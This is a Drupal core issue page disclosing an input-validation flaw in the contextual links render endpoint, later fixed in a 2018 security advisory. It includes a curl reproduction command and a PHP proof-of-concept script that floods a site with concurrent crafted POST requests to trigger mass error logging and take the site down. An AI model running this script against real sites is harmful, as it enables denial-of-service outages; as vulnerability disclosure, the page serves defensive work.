ContextualController::render() method accepts parameters from HTTP request without proper validation.

Steps to reproduce:

  1. Create an account with permission to use contextual links (you may add this permission to anonymous role for testing purpose).
  2. Execute the following POST request on behalf of this account.
    curl --data "ids[]=node:node[]" https://example.com/contextual/render
  3. Navigate to admin/reports/dblog and check new records in the log (there should be about 9 PHP errors logged)

Generally being able to produce PHP errors with an HTTP request is not considered as a security issue. There are multiple other ways even without special permissions. However this case is different because you can multiply number of errors by repeating POST parameters.
For example:

  • ids[]=node:node[] - causes 9 PHP errors
  • ids[]=node:node[]&ids[]=node:node[] - causes 18 PHP errors
  • ids[]=node:node[]&ids[]=node:node[]&ids[]=node:node[] - causes 21 PHP errors

With a special crafted HTTP requiest I was able to put 9000 PHP errors to watchdog at once. Since catching and logging PHP errors is an expensive operation this gives a great opportunity to carry out DDOS attacks.

Below is a script to prove concept. 


$url = 'https://example.com';
$concurrency = 100;
$quantity = 1000;

$mh = curl_multi_init();
$handlers = [];
for ($i = 1; $i <= $concurrency; $i++) {
  $handlers[] = $ch = curl_init();
  curl_setopt($ch, CURLOPT_URL, $url . '/contextual/render');
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
  curl_setopt($ch, CURLOPT_POSTFIELDS, str_repeat('ids[]=node:node[]&', $quantity));
  curl_multi_add_handle($mh, $ch);
}

$running = NULL;
do {
  curl_multi_exec($mh, $running);
  curl_multi_select($mh);
}
while ($running);

foreach ($handlers as $ch) {
  echo '-> ', curl_getinfo($ch, CURLINFO_HTTP_CODE),  "\n";
  echo strip_tags(curl_multi_getcontent($ch)), "\n";
  curl_multi_remove_handle($mh, $ch);
}

curl_multi_close($mh);

On my local docker container $concurrency = 5 was enough to put site down. On simplytest.me it varies from 50 to 100.

Mitigation

The attacker should have "Use contextual links" permission.

The issue was moved from s.d.o after security team approval.

Comments

Chi created an issue. See original summary.

Chi’s picture

Chi CreditAttribution: Chi commented
Issue summary: View changes

Version: 8.3.x-dev » 8.4.x-dev

Drupal 8.3.6 was released on August 2, 2017 and is the final full bugfix release for the Drupal 8.3.x series. Drupal 8.3.x will not receive any further development aside from critical and security fixes. Sites should prepare to update to 8.4.0 on October 4, 2017. (Drupal 8.4.0-alpha1 is available for testing.)

Bug reports should be targeted against the 8.4.x-dev branch from now on, and new development or disruptive changes should be targeted against the 8.5.x-dev branch. For more information see the Drupal 8 minor version schedule and the Allowed changes during the Drupal 8 release cycle.

Version: 8.4.x-dev » 8.5.x-dev

Drupal 8.4.4 was released on January 3, 2018 and is the final full bugfix release for the Drupal 8.4.x series. Drupal 8.4.x will not receive any further development aside from critical and security fixes. Sites should prepare to update to 8.5.0 on March 7, 2018. (Drupal 8.5.0-alpha1 is available for testing.)

Bug reports should be targeted against the 8.5.x-dev branch from now on, and new development or disruptive changes should be targeted against the 8.6.x-dev branch. For more information see the Drupal 8 minor version schedule and the Allowed changes during the Drupal 8 release cycle.

Version: 8.5.x-dev » 8.6.x-dev

Drupal 8.5.6 was released on August 1, 2018 and is the final bugfix release for the Drupal 8.5.x series. Drupal 8.5.x will not receive any further development aside from security fixes. Sites should prepare to update to 8.6.0 on September 5, 2018. (Drupal 8.6.0-rc1 is available for testing.)

Bug reports should be targeted against the 8.6.x-dev branch from now on, and new development or disruptive changes should be targeted against the 8.7.x-dev branch. For more information see the Drupal 8 minor version schedule and the Allowed changes during the Drupal 8 release cycle.

Version: 8.6.x-dev » 8.8.x-dev

Drupal 8.6.x will not receive any further development aside from security fixes. Bug reports should be targeted against the 8.8.x-dev branch from now on, and new development or disruptive changes should be targeted against the 8.9.x-dev branch. For more information see the Drupal 8 and 9 minor version schedule and the Allowed changes during the Drupal 8 and 9 release cycles.

Version: 8.8.x-dev » 8.9.x-dev

Drupal 8.8.7 was released on June 3, 2020 and is the final full bugfix release for the Drupal 8.8.x series. Drupal 8.8.x will not receive any further development aside from security fixes. Sites should prepare to update to Drupal 8.9.0 or Drupal 9.0.0 for ongoing support.

Bug reports should be targeted against the 8.9.x-dev branch from now on, and new development or disruptive changes should be targeted against the 9.1.x-dev branch. For more information see the Drupal 8 and 9 minor version schedule and the Allowed changes during the Drupal 8 and 9 release cycles.

Version: 8.9.x-dev » 9.2.x-dev

Drupal 8 is end-of-life as of November 17, 2021. There will not be further changes made to Drupal 8. Bugfixes are now made to the 9.3.x and higher branches only. For more information see the Drupal core minor version schedule and the Allowed changes during the Drupal core release cycle.

Version: 9.2.x-dev » 9.3.x-dev
larowlan’s picture

larowlan
Location 🇦🇺🏝.au GMT+10
CreditAttribution: larowlan at PreviousNext commented
Status: Active » Closed (duplicate)

This was resolved by https://www.drupal.org/sa-core-2018-006